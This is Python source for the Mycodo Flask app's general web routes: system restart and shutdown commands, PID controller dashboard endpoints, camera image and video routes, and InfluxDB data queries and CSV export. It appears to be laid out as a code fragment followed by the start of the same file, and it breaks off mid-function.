if action not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
flash("Unrecognized command: {action}".format(
action=action), "success")
return redirect('/settings')
if DOCKER_CONTAINER:
if action == 'daemon_restart':
control = DaemonControl()
control.terminate_daemon()
flash(gettext("Command to restart the daemon sent"), "success")
elif action == 'frontend_reload':
subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
flash(gettext("Command to reload the frontend sent"), "success")
else:
cmd = '{path}/mycodo/scripts/mycodo_wrapper {action} 2>&1'.format(
path=INSTALL_DIRECTORY, action=action)
subprocess.Popen(cmd, shell=True)
if action == 'restart':
flash(gettext("System rebooting in 10 seconds"), "success")
elif action == 'shutdown':
flash(gettext("System shutting down in 10 seconds"), "success")
elif action == 'daemon_restart':
flash(gettext("Command to restart the daemon sent"), "success")
elif action == 'frontend_reload':
flash(gettext("Command to reload the frontend sent"), "success")
return redirect('/settings')
except Exception as e:
logger.error("System command '{cmd}' raised and error: "
"{err}".format(cmd=action, err=e))
flash("System command '{cmd}' raised and error: "
"{err}".format(cmd=action, err=e), "error")
return redirect(url_for('routes_general.home'))
#
# PID Dashboard object routes
#
def return_point_timestamp(dev_id, unit, period, measurement=None, channel=None):
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
query_str = query_string(
unit,
dev_id,
measure=measurement,
channel=channel,
value='LAST',
past_sec=period)
if query_str == 1:
return [None, None]
try:
raw_data = dbcon.query(query_str).raw
number = len(raw_data['series'][0]['values'])
time_raw = raw_data['series'][0]['values'][number - 1][0]
value = raw_data['series'][0]['values'][number - 1][1]
value = '{:.3f}'.format(float(value))
# Convert date-time to epoch (potential bottleneck for data)
dt = date_parse(time_raw)
timestamp = calendar.timegm(dt.timetuple()) * 1000
return [timestamp, value]
except KeyError:
return [None, None]
except Exception:
return [None, None]
@blueprint.route('/last_pid/<pid_id>/<input_period>')
@flask_login.login_required
def last_data_pid(pid_id, input_period):
"""Return the most recent time and value from influxdb"""
if not str_is_float(input_period):
return '', 204
try:
pid = PID.query.filter(PID.unique_id == pid_id).first()
if len(pid.measurement.split(',')) == 2:
device_id = pid.measurement.split(',')[0]
measurement_id = pid.measurement.split(',')[1]
else:
device_id = None
measurement_id = None
actual_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
if actual_measurement:
actual_conversion = Conversion.query.filter(
Conversion.unique_id == actual_measurement.conversion_id).first()
else:
actual_conversion = None
(actual_channel,
actual_unit,
actual_measurement) = return_measurement_info(
actual_measurement, actual_conversion)
setpoint_unit = None
if pid and ',' in pid.measurement:
pid_measurement = pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, setpoint_unit, _ = return_measurement_info(setpoint_measurement, conversion)
p_value = return_point_timestamp(
pid_id, 'pid_value', input_period, measurement='pid_p_value')
i_value = return_point_timestamp(
pid_id, 'pid_value', input_period, measurement='pid_i_value')
d_value = return_point_timestamp(
pid_id, 'pid_value', input_period, measurement='pid_d_value')
if None not in (p_value[1], i_value[1], d_value[1]):
pid_value = [p_value[0], '{:.3f}'.format(float(p_value[1]) + float(i_value[1]) + float(d_value[1]))]
else:
pid_value = None
setpoint_band = None
if pid.band:
try:
daemon = DaemonControl()
setpoint_band = daemon.pid_get(pid.unique_id, 'setpoint_band')
except:
logger.debug("Couldn't get setpoint")
live_data = {
'activated': pid.is_activated,
'paused': pid.is_paused,
'held': pid.is_held,
'setpoint': return_point_timestamp(
pid_id, setpoint_unit, input_period, channel=0),
'setpoint_band': setpoint_band,
'pid_p_value': p_value,
'pid_i_value': i_value,
'pid_d_value': d_value,
'pid_pid_value': pid_value,
'duration_time': return_point_timestamp(
pid_id, 's', input_period, measurement='duration_time'),
'duty_cycle': return_point_timestamp(
pid_id, 'percent', input_period, measurement='duty_cycle'),
'actual': return_point_timestamp(
device_id,
actual_unit,
input_period,
measurement=actual_measurement,
channel=actual_channel)
}
return jsonify(live_data)
except KeyError:
logger.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
logger.exception("URL for 'last_pid' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/pid_mod_unique_id/<unique_id>/<state>')
@flask_login.login_required
def pid_mod_unique_id(unique_id, state):
""" Manipulate output (using unique ID) """
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate PID'
pid = PID.query.filter(PID.unique_id == unique_id).first()
daemon = DaemonControl()
if state == 'activate_pid':
pid.is_activated = True
pid.save()
_, return_str = daemon.controller_activate(pid.unique_id)
return return_str
elif state == 'deactivate_pid':
pid.is_activated = False
pid.is_paused = False
pid.is_held = False
pid.save()
_, return_str = daemon.controller_deactivate(pid.unique_id)
return return_str
elif state == 'pause_pid':
pid.is_paused = True
pid.save()
if pid.is_activated:
return_str = daemon.pid_pause(pid.unique_id)
else:
return_str = "PID Paused (Note: PID is not currently active)"
return return_str
elif state == 'hold_pid':
pid.is_held = True
pid.save()
if pid.is_activated:
return_str = daemon.pid_hold(pid.unique_id)
else:
return_str = "PID Held (Note: PID is not currently active)"
return return_str
elif state == 'resume_pid':
pid.is_held = False
pid.is_paused = False
pid.save()
if pid.is_activated:
return_str = daemon.pid_resume(pid.unique_id)
else:
return_str = "PID Resumed (Note: PID is not currently active)"
return return_str
elif 'set_setpoint_pid' in state:
pid.setpoint = state.split('|')[1]
pid.save()
if pid.is_activated:
return_str = daemon.pid_set(pid.unique_id, 'setpoint', float(state.split('|')[1]))
else:
return_str = "PID Setpoint changed (Note: PID is not currently active)"
return return_str
# import flask_login
# from mycodo.mycodo_flask.api import api
# @blueprint.route('/export_swagger')
# @flask_login.login_required
# def export_swagger():
# """Export swagger JSON to swagger.json file"""
# from mycodo.mycodo_flask.utils import utils_general
# import json
# if not utils_general.user_has_permission('view_settings'):
# return 'You do not have permission to access this.', 401
# with open("/home/pi/swagger.json", "w") as text_file:
# text_file.write(json.dumps(api.__schema__, indent=2))
# return 'success'
| # coding=utf-8
import calendar
import datetime
import logging
import subprocess
import time
from importlib import import_module
import flask_login
import os
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_
from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
blueprint = Blueprint('routes_general',
__name__,
static_folder='../static',
template_folder='../templates')
logger = logging.getLogger(__name__)
limiter = Limiter(key_func=get_ip_address)
@blueprint.route('/')
def home():
"""Load the default landing page"""
try:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.landing_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.landing_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.landing_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
logger.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@blueprint.route('/index_page')
def index_page():
"""Load the index page"""
try:
if not flask_login.current_user.index_page:
return home()
elif flask_login.current_user.index_page == 'landing':
return home()
else:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.index_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.index_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.index_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
logger.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@blueprint.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def page_settings():
return redirect('settings/general')
@blueprint.route('/note_attachment/<filename>')
@flask_login.login_required
def send_note_attachment(filename):
"""Return a file from the note attachment directory"""
file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)
if file_path is not None:
try:
if os.path.abspath(file_path).startswith(PATH_NOTE_ATTACHMENTS):
return send_file(file_path, as_attachment=True)
except Exception:
logger.exception("Send note attachment")
@blueprint.route('/camera/<camera_unique_id>/<img_type>/<filename>')
@flask_login.login_required
def camera_img_return_path(camera_unique_id, img_type, filename):
"""Return an image from stills or time-lapses"""
camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()
camera_path = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))
if img_type == 'still':
if camera.path_still:
path = camera.path_still
else:
path = os.path.join(camera_path, img_type)
elif img_type == 'timelapse':
if camera.path_timelapse:
path = camera.path_timelapse
else:
path = os.path.join(camera_path, img_type)
else:
return "Unknown Image Type"
if os.path.isdir(path):
files = (files for files in os.listdir(path)
if os.path.isfile(os.path.join(path, files)))
else:
files = []
if filename in files:
path_file = os.path.join(path, filename)
if os.path.abspath(path_file).startswith(path):
return send_file(path_file, mimetype='image/jpeg')
return "Image not found"
@blueprint.route('/camera_acquire_image/<image_type>/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_acquire(image_type, camera_unique_id, max_age):
"""Capture an image and return the filename"""
if image_type == 'new':
tmp_filename = None
elif image_type == 'tmp':
tmp_filename = '{id}_tmp.jpg'.format(id=camera_unique_id)
else:
return
path, filename = camera_record('photo', camera_unique_id, tmp_filename=tmp_filename)
image_path = os.path.join(path, filename)
time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
timestamp = os.path.getctime(image_path)
if datetime.datetime.fromtimestamp(timestamp) > time_max_age:
date_time = datetime.datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S')
return_values = '["{}","{}"]'.format(filename, date_time)
else:
return_values = '["max_age_exceeded"]'
return Response(return_values, mimetype='text/json')
@blueprint.route('/camera_latest_timelapse/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_latest_timelapse(camera_unique_id, max_age):
"""Capture an image and/or return a filename"""
camera = Camera.query.filter(
Camera.unique_id == camera_unique_id).first()
_, tl_path = utils_general.get_camera_paths(camera)
timelapse_file_path = os.path.join(tl_path, str(camera.timelapse_last_file))
if camera.timelapse_last_file is not None and os.path.exists(timelapse_file_path):
time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
if datetime.datetime.fromtimestamp(camera.timelapse_last_ts) > time_max_age:
ts = datetime.datetime.fromtimestamp(camera.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
return_values = '["{}","{}"]'.format(camera.timelapse_last_file, ts)
else:
return_values = '["max_age_exceeded"]'
else:
return_values = '["file_not_found"]'
return Response(return_values, mimetype='text/json')
def gen(camera):
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@blueprint.route('/video_feed/<unique_id>')
@flask_login.login_required
def video_feed(unique_id):
"""Video streaming route. Put this in the src attribute of an img tag."""
camera_options = Camera.query.filter(Camera.unique_id == unique_id).first()
camera_stream = import_module('mycodo.mycodo_flask.camera.camera_' + camera_options.library).Camera
camera_stream.set_camera_options(camera_options)
return Response(gen(camera_stream(unique_id=unique_id)),
mimetype='multipart/x-mixed-replace; boundary=frame')
@blueprint.route('/outputstate')
@flask_login.login_required
def gpio_state():
"""Return all output states"""
return jsonify(get_all_output_states())
@blueprint.route('/outputstate_unique_id/<unique_id>/<channel_id>')
@flask_login.login_required
def gpio_state_unique_id(unique_id, channel_id):
"""Return the GPIO state, for dashboard output """
channel = OutputChannel.query.filter(OutputChannel.unique_id == channel_id).first()
daemon_control = DaemonControl()
state = daemon_control.output_state(unique_id, channel.channel)
return jsonify(state)
@blueprint.route('/widget_execute/<unique_id>')
@flask_login.login_required
def widget_execute(unique_id):
"""Return the response from the execution of widget code """
daemon_control = DaemonControl()
return_value = daemon_control.widget_execute(unique_id)
return jsonify(return_value)
@blueprint.route('/time')
@flask_login.login_required
def get_time():
""" Return the current time """
return jsonify(datetime.datetime.now().strftime('%m/%d %H:%M'))
@blueprint.route('/dl/<dl_type>/<path:filename>')
@flask_login.login_required
def download_file(dl_type, filename):
"""Serve log file to download"""
if dl_type == 'log':
return send_from_directory(LOG_PATH, filename, as_attachment=True)
return '', 204
@blueprint.route('/last/<unique_id>/<measure_type>/<measurement_id>/<period>')
@flask_login.login_required
def last_data(unique_id, measure_type, measurement_id, period):
"""Return the most recent time and value from influxdb"""
if not str_is_float(period):
return '', 204
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
return '', 204
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
if setpoint_pid and ',' in setpoint_pid.measurement:
pid_measurement = setpoint_pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, unit, measurement = return_measurement_info(setpoint_measurement, conversion)
try:
if period != '0':
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
value='LAST', past_sec=period)
else:
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
value='LAST')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
number = len(raw_data['series'][0]['values'])
time_raw = raw_data['series'][0]['values'][number - 1][0]
value = raw_data['series'][0]['values'][number - 1][1]
value = float(value)
# Convert date-time to epoch (potential bottleneck for data)
dt = date_parse(time_raw)
timestamp = calendar.timegm(dt.timetuple()) * 1000
live_data = '[{},{}]'.format(timestamp, value)
return Response(live_data, mimetype='text/json')
except KeyError:
logger.debug("No Data returned form influxdb")
return '', 204
except IndexError:
logger.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
logger.exception("URL for 'last_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/past/<unique_id>/<measure_type>/<measurement_id>/<past_seconds>')
@flask_login.login_required
def past_data(unique_id, measure_type, measurement_id, past_seconds):
"""Return data from past_seconds until present from influxdb"""
if not str_is_float(past_seconds):
return '', 204
if measure_type == 'tag':
notes_list = []
tag = NoteTags.query.filter(NoteTags.unique_id == unique_id).first()
notes = Notes.query.filter(
Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(past_seconds)))).all()
for each_note in notes:
if tag.unique_id in each_note.tags.split(','):
notes_list.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if notes_list:
return jsonify(notes_list)
else:
return '', 204
elif measure_type in ['input', 'math', 'function', 'output', 'pid']:
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
measure = None
if not measure:
return "Could not find measurement"
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
if setpoint_pid and ',' in setpoint_pid.measurement:
pid_measurement = setpoint_pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, unit, measurement = return_measurement_info(setpoint_measurement, conversion)
try:
query_str = query_string(
unit, unique_id,
measure=measurement,
channel=channel,
past_sec=past_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
if 'series' in raw_data and raw_data['series']:
return jsonify(raw_data['series'][0]['values'])
else:
return '', 204
except Exception as e:
logger.debug("URL for 'past_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/generate_thermal_image/<unique_id>/<timestamp>')
@flask_login.login_required
def generate_thermal_image_from_timestamp(unique_id, timestamp):
"""Return a file from the note attachment directory"""
ts_now = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
camera_path = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=unique_id)))
filename = 'Still-{uid}-{ts}.jpg'.format(
uid=unique_id,
ts=ts_now).replace(" ", "_")
save_path = assure_path_exists(os.path.join(camera_path, 'thermal'))
assure_path_exists(save_path)
path_file = os.path.join(save_path, filename)
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
input_dev = Input.query.filter(Input.unique_id == unique_id).first()
pixels = []
success = True
start = int(int(timestamp) / 1000.0) # Round down
end = start + 1 # Round up
start_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(start))
end_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(end))
for each_channel in range(input_dev.channels):
measurement = 'channel_{chan}'.format(
chan=each_channel)
query_str = query_string(measurement, unique_id,
start_str=start_timestamp,
end_str=end_timestamp)
if query_str == 1:
logger.error('Invalid query string')
success = False
else:
raw_data = dbcon.query(query_str).raw
if not raw_data or 'series' not in raw_data or not raw_data['series']:
logger.error('No measurements to export in this time period')
success = False
else:
pixels.append(raw_data['series'][0]['values'][0][1])
# logger.error("generate_thermal_image_from_timestamp: success: {}, pixels: {}".format(success, pixels))
if success:
generate_thermal_image_from_pixels(pixels, 8, 8, path_file)
return send_file(path_file, mimetype='image/jpeg')
else:
return "Could not generate image"
@blueprint.route('/export_data/<unique_id>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def export_data(unique_id, measurement_id, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for exporting data.
"""
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE, timeout=100)
output = Output.query.filter(Output.unique_id == unique_id).first()
input_dev = Input.query.filter(Input.unique_id == unique_id).first()
math = Math.query.filter(Math.unique_id == unique_id).first()
if output:
name = output.name
elif input_dev:
name = input_dev.name
elif math:
name = math.name
else:
name = None
device_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
if device_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == device_measurement.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
device_measurement, conversion)
utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now()
start = datetime.datetime.fromtimestamp(float(start_seconds))
start += utc_offset_timedelta
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.fromtimestamp(float(end_seconds))
end += utc_offset_timedelta
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
start_str=start_str, end_str=end_str)
if query_str == 1:
flash('Invalid query string', 'error')
return redirect(url_for('routes_page.page_export'))
raw_data = dbcon.query(query_str).raw
if not raw_data or 'series' not in raw_data or not raw_data['series']:
flash('No measurements to export in this time period', 'error')
return redirect(url_for('routes_page.page_export'))
# Generate column names
col_1 = 'timestamp (UTC)'
col_2 = '{name} {meas} ({id})'.format(
name=name, meas=measurement, id=unique_id)
csv_filename = '{id}_{name}_{meas}.csv'.format(
id=unique_id, name=name, meas=measurement)
import csv
from io import StringIO
def iter_csv(data):
""" Stream CSV file to user for download """
line = StringIO()
writer = csv.writer(line)
writer.writerow([col_1, col_2])
for csv_line in data:
writer.writerow([
str(csv_line[0][:-4]).replace('T', ' '),
csv_line[1]
])
line.seek(0)
yield line.read()
line.truncate(0)
line.seek(0)
response = Response(iter_csv(raw_data['series'][0]['values']), mimetype='text/csv')
response.headers['Content-Disposition'] = 'attachment; filename="{}"'.format(csv_filename)
return response
@blueprint.route('/async/<device_id>/<device_type>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_data(device_id, device_type, measurement_id, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for asynchronous graph display of many points (up to millions).
"""
if device_type == 'tag':
notes_list = []
tag = NoteTags.query.filter(NoteTags.unique_id == device_id).first()
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
if end_seconds == '0':
end = datetime.datetime.utcnow()
else:
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
notes = Notes.query.filter(
and_(Notes.date_time >= start, Notes.date_time <= end)).all()
for each_note in notes:
if tag.unique_id in each_note.tags.split(','):
notes_list.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if notes_list:
return jsonify(notes_list)
else:
return '', 204
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if device_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
measure = None
if not measure:
return "Could not find measurement"
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
# Set the time frame to the past year if start/end not specified
if start_seconds == '0' and end_seconds == '0':
# Get how many points there are in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
# Set the time frame to the past start epoch to now
elif start_seconds != '0' and end_seconds == '0':
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
count_points = raw_data['series'][0]['values'][0][1]
except:
return '', 204
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
else:
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
count_points = raw_data['series'][0]['values'][0][1]
except:
return '', 204
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
start = datetime.datetime.strptime(
influx_time_str_to_milliseconds(first_point),
'%Y-%m-%dT%H:%M:%S.%f')
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
logger.debug('Count = {}'.format(count_points))
logger.debug('Start = {}'.format(start))
logger.debug('End = {}'.format(end))
# How many seconds between the start and end period
time_difference_seconds = (end - start).total_seconds()
logger.debug('Difference seconds = {}'.format(time_difference_seconds))
# If there are more than 700 points in the time frame, we need to group
# data points into 700 groups with points averaged in each group.
if count_points > 700:
# Average period between input reads
seconds_per_point = time_difference_seconds / count_points
logger.debug('Seconds per point = {}'.format(seconds_per_point))
# How many seconds to group data points in
group_seconds = int(time_difference_seconds / 700)
logger.debug('Group seconds = {}'.format(group_seconds))
try:
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='MEAN',
start_str=start_str,
end_str=end_str,
group_sec=group_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
return jsonify(raw_data['series'][0]['values'])
except:
return '', 204
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/async_usage/<device_id>/<unit>/<channel>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_usage_data(device_id, unit, channel, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for asynchronous energy usage display of many points (up to millions).
"""
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
# Set the time frame to the past year if start/end not specified
if start_seconds == '0' and end_seconds == '0':
# Get how many points there are in the past year
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
# Set the time frame to the past start epoch to now
elif start_seconds != '0' and end_seconds == '0':
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
else:
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
start = datetime.datetime.strptime(
influx_time_str_to_milliseconds(first_point),
